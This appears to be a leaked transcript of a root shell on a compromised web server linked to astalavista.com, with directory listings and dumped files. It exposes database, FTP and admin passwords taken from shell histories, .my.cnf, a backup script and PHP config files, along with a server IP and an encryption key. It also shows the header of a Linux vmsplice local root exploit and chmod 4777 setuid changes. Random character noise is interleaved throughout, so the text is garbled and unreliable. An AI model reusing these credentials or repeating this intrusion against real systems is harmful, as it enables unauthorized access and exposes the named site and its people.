drwxr-xr-x 4 root root 4096 May 20 2008 .cpan / x9 Q) L0 h" ?" R( P-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc- N4 u- q* w2 S- X9 j
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql " H. ^ A; [- U; N8 \drwx—— 2 root root 4096 Oct 28 2007 .elinks ' w' S$ i; f4 C+ g: m5 odrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1. `8 J5 ~5 T- H3 K0 k% @1 F T
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2 " ~7 M( r' A4 a. g-rw——- 1 root root 0 Apr 16 13:19 .history / j9 a; T0 _. \0 u-rw-r–r– 1 root root 16095 Sep 11 2007 install.log : `- ?7 `1 e4 z! c7 ]-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog 2 m% j: k- M( I2 ]9 N; Y% V-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh$ g1 k4 y. X* `8 T& h# e
-rw——- 1 root root 35 Jun 2 14:23 .lesshst5 ?& M8 ]6 A/ g* d
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp; a( J4 @. J/ Y7 `+ ?! F0 Y3 S4 ]
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec 8 I6 r; C3 ]3 h8 o4 P, F7 D-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz : n/ f, r* x g. n1 }0 U-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2 ) ]- Q" j @) c- f-rwx—— 1 root root 760 Sep 18 2008 lp8 L( [' ?0 b8 c& d4 M% b% d
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1 6 W" d2 I) P7 C( W) n% A+ R% l-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz - m2 ], c d6 O/ d# A' l% ]-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1 ; J! H H4 |" C; e' J% l9 a7 Rdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9% H& F9 O0 c5 C
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz9 K' @& W( N" W5 i& @# `0 d
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3 ' `8 J, Z9 u1 B j-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz 2 ~0 q. q! E; h-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh2 E' i' u3 T8 K/ k/ v6 |( W
-rw——- 1 root root 41 Oct 19 2007 .my.cnf , G; Z5 }( F! i. [1 e9 ^-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history 2 }( c# [. R y* B. z u2 S; p+ d-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport 9 T4 _6 I# S& b# o0 u-rw——- 1 root root 41 May 20 2008 .mytop , E k% d+ [: d4 N7 ldrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6 Z% J ~+ M$ L) K
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz T6 [( W/ U$ _drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp 0 v3 k6 A* K+ ]0 T8 d u-rw——- 1 root root 1462 Sep 21 2007 opt.php7 a$ L `- Y- _8 ]6 I
-rw-r–r– 1 root root 3371 Sep 22 2007 p; D, z9 }+ Y7 H* V2 O
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2; q: V, r( e, K5 J
-rw——- 1 root root 1024 Feb 3 21:32 .rnd3 X( c0 s1 c: ~$ S A1 E5 u
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr 2 o' s$ h3 F; Q; i-rw-r–r– 1 root root 887 Nov 28 2007 server.key, O% T% ^5 {! e; ^7 J
drwx—— 2 root root 4096 Oct 10 2008 .ssh- U5 x& p7 @! s$ |5 y1 A( l. E
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat / @2 L8 T" s% A! p" _% Z, b1 @0 r. ~-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc3 Q* g# X8 i* R( |8 P. S6 b
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip a/ m' U- W5 _. K-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.17 r; X5 W- j1 J" v! {# `
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp : |3 ]! A$ P; e G, c ?% c-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh ( `% m! {# A. z" h" g; b, ~drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0 - t m7 y! k( f! ~! ?( E-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2, b! r' X+ x: y9 {/ R+ P
-rw——- 1 root root 12997 May 16 2008 .viminfo, h8 }- C0 ?& b8 ^/ b
* Q6 J9 @; _5 ]6 i; M
sh-3.2# cat .bash_history 5 c7 i4 F2 C; n[snip]5 q( T2 a2 C5 S F/ s
wget cp4sst.com/sstlinux.tar.gz " s6 i8 E' R7 }! qtar zxvf sstlinux.tar.gz % O) H4 b3 S/ G' Xcd linux-2.6.27.10 ; s; R* T4 v; n$ g! Esh install.sh+ H: I8 D/ C' o' q+ P8 H* t+ }
make bzImage ; make modules ; make modules_install ; make install) j: L( ]% j7 S+ O! o" E/ E
make clean. l( K$ o# v! O9 t
service mysqld restart# G( Z8 g7 ^+ L' c8 ?
[snip]! ]( G6 Q; \) ?( t$ F% H5 z
cd /usr/sbin/7 a8 E' I/ E4 k3 V% ~) y
chmod 4777 traceroute4 V7 @2 j6 e/ t- S2 c# D
chmod 4777 ping2 u" l7 L% X; [8 q! p% S* y
traceroute -I 链接标记[url]www.astalavista.ch[/url] ' t* S& Z$ e; w, p$ Q7 T, ][snip]4 D2 j. A S: J& }/ _$ @' X) d
vi /etc/csf/csf.conf a$ v! j, Y8 q2 Y
traceroute google.ch7 u- c) ?3 V0 z$ A3 P) ?
service csf restart5 [" Y$ q/ l$ s% o
tracert google.ch 9 E5 q& x, K* J$ Bservice csf restart. {9 x6 V: y, [" l. s( C8 E
traceroute 链接标记[url]www.google.ch[/url] 2 X. g q( M5 Ltracert 链接标记[url]www.google.ch[/url]# D/ K% r2 g5 j5 W
traceroute 链接标记[url]www.google.ch[/url] 1 s( E0 g; c& c/ u# j3 Q D* @6 ~locate traceroute" F- m) j" l3 ~) Z- T
chown 4755 /bin/traceroute \5 i/ F3 ?$ Y: M1 y' \3 ?/ ]chown 4777 /bin/traceroute 2 \' i; a! m% d, m2 ^1 klocate ping " R, }! c1 W/ r( `' E& Ichown 4755 /bin/ping / z1 L% ?; j. T2 uchown 4777 /bin/ping8 t- ?# }" z' b8 _. y9 i
cd /bin/, k5 N5 f* f& V; m
ls -ali | grep ping5 N% F. O( Z4 e& t N6 Z: G
chown root ping4 l L: A; x, f* k0 e) ~5 H
chmod 4755 ping * m0 B7 Z. W( m; W# e/ als -ali | grep traceroute% b$ t3 `( C0 i$ Q
chown root traceroute " `1 u1 P2 s! Q! h( K9 Kchmod 4755 traceroute # J! u' W' x3 N4 m- C4 q1 Qls -ali | grep traceroute * D: s' N& \' w8 Wtraceroute -I 链接标记[url]www.google.ch[/url]% i# @- f( F. ^( U
traceroute 链接标记[url]www.google.ch[/url]! y7 n% h' M# E d }
whois pmsantos.ch - m; V4 L" Z' b5 S+ ~# }[snip] & L) Y2 s$ O; N, J4 d0 p Vmysql -h com_contrexx2_live < /root/defaultp_ports.sql4 a3 ~8 o. T4 L7 O
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql ) z) G+ h5 e) h" \% u3 I8 kmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql * L$ j" i+ d: pmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql # r& G i- Q A9 j- Ytop3 a1 N* q& a" C- t% t4 C
ping ssth.ch* S# R: Y3 C* [8 @; X& L. n2 b. I' g6 n
ping asdlkfaljgasd???ljg???lasj.ch& s! r* M6 o. l: P; k* {$ v
ping asdlkfaljgasdlasj.ch # F9 o7 j* c/ k& L {3 ?: kping 链接标记[url]www.ssth.ch[/url] - z# a$ c* D2 G$ y9 ~, T; ]' tping ssth.ch: V4 E! y* x; P) P5 V' i
nslookup 链接标记[url]www.google.ch[/url]+ m+ M& M$ w7 ^& A- j5 e
nslookup 链接标记[url]www.ssth.ch[/url]& u* B7 M" U9 W/ n. f* q
man nslookup o. w+ u1 g* V$ d( B
ping 链接标记[url]www.google.ch[/url]6 k- I9 S8 \. H
nslookup 链接标记[url]www.google.ch[/url]+ l! e J- c/ K. u$ U
nslookup 链接标记[url]www.google.ch[/url]% x( e, m; f [# @, t" m* }
nslookup salfjasdlf.ch 7 ?4 z+ t# d0 _! ^8 U, p[snip]0 `- m% Q4 b7 ]- v, Q" C8 h
openssl passwd -1 sadf 5 P0 e" o* b8 Z5 R% hopenssl passwd -1 5cZNHstdTy 4 ]2 v. k8 S+ O+ cmysql) ^/ }' {2 G* V
mysql 5 ~' z6 h- @8 i, G2 B, h, V( Alocate proftp& b+ c: k& K2 F) B- b8 R7 X2 [
vi /etc/proftpd.passwd0 Z! J9 B7 K+ d$ E
service proftpd restart) p3 b) |% @& I1 L( \
locate proftpd.conf% Q+ L/ v* z% O
vi /etc/proftpd.conf 9 S0 j1 [: ^$ y: d* B J& \0 cvi /etc/proftpd.passwd+ B0 c* C% Y6 ]7 @3 e3 |
service proftpd restart 1 J9 y+ l: ~6 q2 u[snip]& M4 R8 r( H3 i9 _6 n+ k
/bin/sh /home/com/backup_system/backup.sh: ^- d# ]) L3 r" l
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin 8 F0 _- k5 m1 O" K y* W& v# imysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql , L6 J3 ~4 ]6 s4 ^' N' M5 _mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql. H+ ~ g( }, D* J3 W+ d: j- p- P' @" X
ls -ali 4 ~" g5 h; q- l7 [- }5 y. Amysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql 2 ^8 ~5 S/ m- O$ f: V& Lmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql 9 N% _) ]( w! r6 ycrontab -l 7 z0 I2 H. z" K1 L3 {6 vcrontab -l: D; Z& W. R: F) }3 d0 Q
php -q /home/com/public_html/modifications/cronjobs/securitynews.php . ?3 `! c Z! w6 Z2 }/home/com/public_html/modifications/cronjobs/exploits.sh - B x G$ l0 A# r: ywget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url] # E% S" T3 n6 w2 @; Ttar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz # q: `0 u' S1 M* [* N/ ?cd lsws-4.0.3 ( X1 _' V5 i& l& l' f- gsh install.sh( m$ \8 e/ k5 `; w
uptime3 \; O* i1 j& ? C/ X
hdparm -tt /dev/sda7 ~* F2 U5 x% q/ Z& j- Z0 ~9 p
iostat P& Q; F6 @" V/ w, I" z
yum install iostat / ~" {) t$ j" Q" r$ ]5 y. ]8 C4 A/ K! ziostat 7 [1 ^: O0 w/ ?) Z- p) [- Dwhereis iostat ( r$ h9 s3 i0 s7 e$ f' C8 I5 tyjm clean all% {7 S5 K9 @+ J
yum clean all ; yum -y update 6 F& _, I, r; _7 B3 }iostat 3 Q: F- l; J0 C. e* S& Y. U7 K5 Kyum install systat: G% [/ v d _' Z, A- n& p
rpm -qa | grep iostat* z5 e- G: [3 y7 V0 e! P+ N" @
rpm -qa | grep sysstat: I3 ?! o% n* y9 i, @, _* v" G
rpm -qa | grep systat 0 |7 Z8 @ @7 R+ ]dmesg -c , {& S8 E; V0 Y& ksysctl -p/ p4 y# I* i3 `4 |2 O
uname -r, s% h# | {4 O" ?: ?6 P. T- A) C
cd /usr/src , [. a' L8 e! W7 f+ `7 Iwget nix101.com/kernels/sstlinux.tar.gz 9 V H3 P6 @- b4 x2 Yshutdown -r now ) X* A3 f: b* F; ?: znano -w /boot/grub/grub.conf7 m, }* e) D3 x4 e: ?
$ ]& V4 R1 U" n+ i
sh-3.2# cat .my.cnf4 r4 |1 G6 p' i( Y
[client] ( `4 ^ O1 |' L, V% ]" Puser=da_admin7 s% w3 n: ~7 u7 i9 q( }; _
password=X9dctmRH ' y" I8 K. n% q. ]6 P! n6 K4 V5 U# @2 c9 P' V& W0 A
sh-3.2# cat /home/com/backup_system/backup.sh : C& @2 p) K/ y5 P3 W; |: n% ~1 ?#!/bin/sh 8 F" p7 N: p Q& O7 p* d7 F. }7 k##################################################################### * d' s2 R3 D/ Y+ s; k& @4 l# #8 c0 t& H V. j1 {/ B
# incremental backup for astalavista.com # ! m, |0 a+ u$ v2 m6 y# #+ Q# r. ^6 F1 s0 S/ g
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #' P0 s5 \, n. H7 Y
# #' X7 S- o" R* Q& T$ o* V
##################################################################### , X8 F2 T- w9 H+ e[snip] 7 a0 _9 _" o1 {PROG_DIR=”/home/com/backup_system”;* _/ K5 N' q3 d& m1 i( Z+ @
BACKUP_DIR=”/home/com/backups”;1 ^8 ]3 K5 ~- }0 x3 j h( f" U
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;& D% K. e$ h. o7 x
# ftp for synology backup server 5 q1 o- P7 q2 }FTP_HOST=”212.254.194.163″;% F; R# m/ ~% l' a) Q7 u: i: @
FTP_PORT=”21″; ' W! O2 R# t1 ?0 y- ?. UFTP_USER=”astalavista.com”;/ { K+ }, F; m; V& Q9 _5 B
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;& J. t. g( Y$ `# N
FTP_DIR=”/astalavista.com”; ; Q) J) z/ a5 W& D# database/ H: D9 _" S" E1 l {8 }
DB_HOST=”localhost”; 2 @# D0 w. }% |% [. oDB_USER=”contrexxuser2″;( _/ k, W* X$ l; N
DB_PASS=”0fEYNZgXz1pKe”; 1 d$ _& [4 w# mDB_DATABASE1=”com_contrexx2_live”;' p, ?2 t/ P$ n
DB_DATABASE2=”com_contrexx2″;$ \' Z2 z7 ~5 Y# N) N( `, f
[snip]3 b. d6 z2 T* e, ~* v
ftp -in $FTP_HOST $FTP_PORT <<EOF4 B2 |' o5 I) M" d( O7 h, B
quote USER $FTP_USER5 a/ t" p& |6 x- T- ^
quote PASS $FTP_PASS t; H# h9 m r8 ?cd $FTP_DIR2 f3 A4 U4 m8 ]' q
put $DB_FULLNAME-SQL_Dump.tar9 {! ?! Z! X2 L
put $BACKUP_FULLNAME-Public_HTML.tar 1 \' K0 l/ n3 L- u/ t2 a/ x8 F! Wclose & a7 K7 {$ }$ }% T6 L) Cbye: ?# ~/ f: k6 K* n- a% ?: V
EOF6 w# q+ l, K! [# x6 t
$ h) Q6 ^8 R! s3 S& B! `sh-3.2# cd /home 3 @- n6 b! F6 t* e6 ?: t: Wsh-3.2# ls -la/ Z* c" N$ i/ p0 w* i
total 120 0 u7 B R: A8 p2 ?8 O5 W+ Qdrwxr-xr-x 14 root root 4096 Mar 11 17:56 . 2 L# w; D/ x* B) Y. {% ?drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. - y; |2 u5 \' ?$ \: rdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin) U! W+ c1 X1 O/ p+ v3 s7 v+ s0 M
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group 5 E5 k0 X. A, v; |/ s( y1 Q-rw——- 1 root root 8192 Jun 3 02:45 aquota.user + _# t1 \3 g& X# a2 v0 j+ Xdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet. @ B/ e. X& F, e+ ^0 ~
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup) K' C0 X, ^2 p6 g6 R5 s1 K& Q
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161/ t$ B% b. u) c) g6 k
drwx–x–x 10 com com 4096 Apr 28 12:40 com 9 W! ?9 r) q, B9 R4 Y6 _/ Edrwxr-xr-x 2 root root 4096 May 17 2007 ftp 7 l# g# A5 h5 B' Edrwx—— 3 jon jon 4096 Sep 21 2007 jon [# o7 W) K$ J0 \ e4 K
drwx—— 2 root root 16384 Sep 11 2007 lost+found , b2 P' B: d8 e* S% _drwxr-xr-x 2 root root 4096 Sep 14 2007 my / Y" ?8 w! y K6 Tdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata& a8 k0 Y$ m6 I1 M2 \
drwx—— 2 jon jon 4096 Sep 15 2007 test : Z1 z* }! p1 P' `drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp 0 f% \' B, u. L/ d& @9 K1 J 2 s) ]/ A; h! Q: w4 b# jsh-3.2# cd admin / A- t" S4 a- S y+ k; p3 |sh-3.2# ls -la. |/ }' o& _( L0 M x
total 17358961 j- X! w7 \: S; o/ j6 e
drwx–x–x 9 admin admin 4096 Nov 28 2007 . $ p- m1 x! y& edrwxr-xr-x 14 root root 4096 Mar 11 17:56 ../ E9 H- l+ p. Y% O$ r# ^9 ]9 A
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups ; u% S7 j/ ~$ V2 M) jdrwx—— 2 admin admin 4096 Sep 28 2007 backups: r& T+ ], R$ D" g. Q: ^
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history4 j0 }& [) d. T, D. l
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout ) w* i6 o2 W3 _ K1 S. O5 p, Y-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile 4 b+ \0 O- J8 s; H-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc5 D. J5 l R5 k( X+ Q7 f
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups 7 T! I8 A+ g5 Y3 Q" tdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains ) j6 j' A5 W, P) mdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap ' p# I2 T q/ w' G$ f-rw-r–r– 1 root root 24 Sep 21 2007 info.php ! l6 v, i* V1 kdrwx—— 2 admin admin 4096 Sep 21 2007 mail/ C$ k4 o' { m7 s" O3 Y
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr8 \6 L+ C7 B. R3 `! n/ [: c
-rw-r–r– 1 root root 887 Nov 28 2007 server.key; l7 f. a" n- M* A$ o2 Z& a* F8 Q
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow. ~, g& ?. Z8 R5 J- v: n7 e
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz3 R, |9 M7 J4 P. O2 t6 q
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups$ P4 y; z2 I# e+ G
[/ e2 `8 j* G3 o- ]& G/ o4 o
sh-3.2# ..9 j( l/ s/ T3 v4 S
sh-3.2# cd jon . J) q) ~) Z- q4 z1 K; zsh-3.2# ls -la( A; S* J; Q3 r
total 36& ^# z. x' s4 E
drwx—— 3 jon jon 4096 Sep 21 2007 .; Z# X8 X4 t' ]6 k
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..( C* ~1 B8 o: l% Y
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history 9 ]8 {9 d+ S* ^- o-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout2 U6 N; r/ l6 U6 z
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile ; C* A5 L+ O# g" d-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc - O7 m D- h0 m-rw-r–r– 1 root root 24 Sep 21 2007 info.php- Z8 W+ ?7 R: L$ A# J8 ?
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html 8 p$ T' V5 c2 J8 A6 p/ i2 F& E1 a! x9 \9 O1 x1 ?
sh-3.2# cd .. 1 }! N2 f4 S+ y; n Qsh-3.2# cd test 6 ~ V7 d1 u. v- @: @5 k+ csh-3.2# ls -la ( ]- x; h, p) a5 B* {* Ftotal 48 3 z$ l2 |1 I$ R3 ^& D# }drwx—— 2 jon jon 4096 Sep 15 2007 . 1 U9 }$ z S9 W$ f! n3 v( o6 Edrwxr-xr-x 14 root root 4096 Mar 11 17:56 .. . [0 w9 i# z, T. h-rw——- 1 jon jon 79 Sep 21 2007 .bash_history / d2 d; {) K8 u-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout3 [+ W* j$ e) N
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile & E2 k7 _- `! R2 f% R-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc + p5 c$ E: K) Rsh-3.2# cat .bash_history6 @' @7 f9 a8 {, t0 j
/usr/bin/mysqladmin -u root password PoliuJhytg67 - V3 L0 Y) E4 o5 R+ p9 G9 a: R + Z4 j: g' n1 Q& ]3 _sh-3.2# cd .." v$ ]$ b/ d1 j( K+ |0 _5 C6 A% t
sh-3.2# cd astanet1 p. Z5 Y( x, K2 d+ r
sh-3.2# ls -la2 r: B1 s, e0 d, P" k- i- d- S
total 52+ q2 y' A- f( {5 Z- _" ]5 Q+ n4 D
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .7 S7 h2 N- Q7 v. E: o
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. ; z$ c9 I! S# e2 d* T& ]* L) Ddrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth ( Y) r. O1 A2 ^, G( ]- ~) @-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history- K. G) i- g: M7 ` f# J
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout$ S( V5 n0 _' t) G" k
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile 8 E& Q$ ~% |+ {" g9 [, _$ ]* @) k-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc1 l0 t% ~5 t1 s
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains 8 \/ Y8 \. W( p; b* e o/ Jdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap 1 R6 u! z5 C6 kdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail- ^2 y# h# x1 e9 v* R# I
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history & {) k, [/ |3 a/ N& Y' olrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html 6 c# b0 X/ r1 N X-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow ( a2 o; R6 E* L0 }* H) [ % W" r3 W+ N) {5 J0 }) g' `) Ksh-3.2# cd auth/( F1 @! B1 Q% c+ @# B. z" v7 f
sh-3.2# ls -la 2 |4 Q; @2 ~5 ]. ?total 28( {/ [ E9 H2 g0 e* R) t
drwxr-xr-x 2 root root 4096 Dec 23 16:00 ., o" t( W* |- ^0 u6 m, ~* I
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..; ?8 U4 J7 j# P# m* o2 a8 H# S
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php % n+ B# V1 y) O- P% R-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php ; b) \% d3 ], @4 ?-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd" f8 o$ q" q/ K& N9 r# m) b
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting! \2 ]1 A" S7 P- O+ h v; a4 f
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd - f9 G. |! y8 b' n- P& u, D; B9 f; P; u5 p
sh-3.2# cat hackercontest.config.inc.php - e% w4 o6 a, J7 f# J% X. q( o5 U$ c<?PHP - U/ m( D: D; L" G+ C; h// Variabeln f?r Verbindung zur Datenbank //6 c4 O& Q! q# h* v, u) E) ~
$conxHost = ‘localhost’; // MySQL hostname 0 l# C4 n1 I& T9 t$conxUser = ‘hackercontest’; // MySQL user 8 C5 b9 K' m1 s# L) F" J$conxPassword = ‘K6m@7dUc’; // MySQL password3 w" a5 v$ e. Y- I3 b
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish: Z; y4 N8 ?1 v7 G$ }) l! E6 s
?> Z( K& [1 D$ Z7 p, k
sh-3.2# cat hosting.config.inc.php 6 ^/ Z9 q d. k& H, ]9 Y; x<?PHP1 d' l7 N. y. M/ _! U% A
// Variabeln f?r Verbindung zur Datenbank // & G5 s4 S! I2 ]. z$ P" V$conxHost = ‘localhost’; // MySQL hostname $ w* G3 Z! v2 } Q2 g" G$conxUser = ‘hostinguser’; // MySQL user 1 f" R# j% u1 J4 L0 I$conxPassword = ‘cXvB3981′; // MySQL password! ~ @( N8 A3 C e4 K. v
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish- L3 C5 Z1 g& |' ?4 F
?>4 t& s; d$ R' X* ]" Z) D
. y7 [) m0 I2 I! |sh-3.2# cd .. 0 A2 |0 t3 ~/ m) l# Q* s- l$ }sh-3.2# cd com 3 `/ e! B$ k9 x- J/ [. E8 ssh-3.2# ls -la6 _: G% g5 V, Y6 ]& C& }! L
total 141208& g% @+ V/ U2 S! }) B& U: c
drwx–x–x 10 com com 4096 Apr 28 12:40 .4 A1 p+ H4 d/ h
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. ; m# p$ n3 P1 {9 Y) Q/ Odrwx—— 2 com com 4096 Jun 4 04:04 backups' p/ ~8 z; i1 B3 s+ d: ^
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql/ D. w( {& A7 K$ R& t$ X3 D
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system2 D; e! ]* L% @' f
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history 8 r' j: F8 ~9 b8 e-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout6 l* u3 E2 Z5 s) n4 Q& s
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile [# V# m; t6 p) [( N
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc : P/ @2 [5 v6 q6 v3 q! `drwx–x–x 3 com com 4096 Jan 29 2008 domains- ?: H. Z, d, k: B3 \
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed p% s. ]9 X: @$ _2 Adrwxrwx— 3 com mail 4096 Jan 6 19:24 imap% Y5 ^, n! r" M- C, M1 O1 `$ |0 `
-rw——- 1 com com 69 Nov 18 2008 .lesshst5 w# w+ E. d% X0 c9 ]6 H- S
drwx—— 2 com com 4096 Sep 24 2007 mail 0 r8 W% R3 |& _% K-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history , l9 e+ A, I" j+ Q8 X) wdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp ' ^: ~5 H$ c: V% tlrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html & g+ d- l# U" D8 f/ K4 z-rw-r—– 1 com mail 34 Sep 24 2007 .shadow 2 I: R/ a P$ P8 h' s4 L* Y: Wdrwx—— 2 com com 4096 Aug 26 2008 .ssh0 S, L/ ?0 R6 C$ z2 n* s) Z
-rwx—— 1 com com 8515 Feb 10 2008 t + U- @& f+ U" o& c; ]2 d) {-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c2 L9 E( B/ x3 _3 s+ O- H& z3 P
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp% G4 O' T6 B4 v- o9 A
-rw-rw-r– 1 com com 617 May 20 2008 .toprc $ r+ p9 g1 C4 e/ H3 w-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql4 u0 Q9 R, C. _9 E X0 X+ Y7 q8 U
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo `; N' V* |/ m; r! }& M-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc 3 P7 L/ x0 K& Y7 l, i* ?8 v + j6 D2 D- h' {3 Tsh-3.2# head t.c % W6 B$ F& j* {, t; ~4 h/* 1 f z n4 O% R9 t c" {* jessica_biel_naked_in_my_bed.c! R) Y9 z' J5 I- P! b
*) i' M7 ^- t5 y) U" w; \
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.6 q. R( Z# R. |3 T- L3 \; P
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca. ; }' t2 ?7 L! k1 R. r6 w* Stejnak je to stare jak cyp a aj jakesyk rozbite.6 k3 [6 A& X% t5 y
*: P( {! F0 h" t% h. q
* Linux vmsplice Local Root Exploit7 Q! `- s3 s6 w$ Q
* By qaaz $ g8 l& ?* |: e4 U: Y* 5 n" R% Q! J7 B% b; U $ o9 K s/ P c4 ]& h" j. f- H* tsh-3.2# cd /. G2 \: H; c: L& O& S; t
sh-3.2# ls -la) ~9 A1 r3 Q4 A
total 3608 d; i9 E, @/ c9 [, }2 W5 e9 |
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .$ ^6 Z9 H8 x+ u0 O; I' T
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. 2 Q! S% x6 @7 [- z9 ^8 C-rw——- 1 root root 10240 Jun 3 02:39 aquota.group# s- `# {6 Y! O# s) i
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user8 |; \6 i* Q$ a# Y4 H$ ^
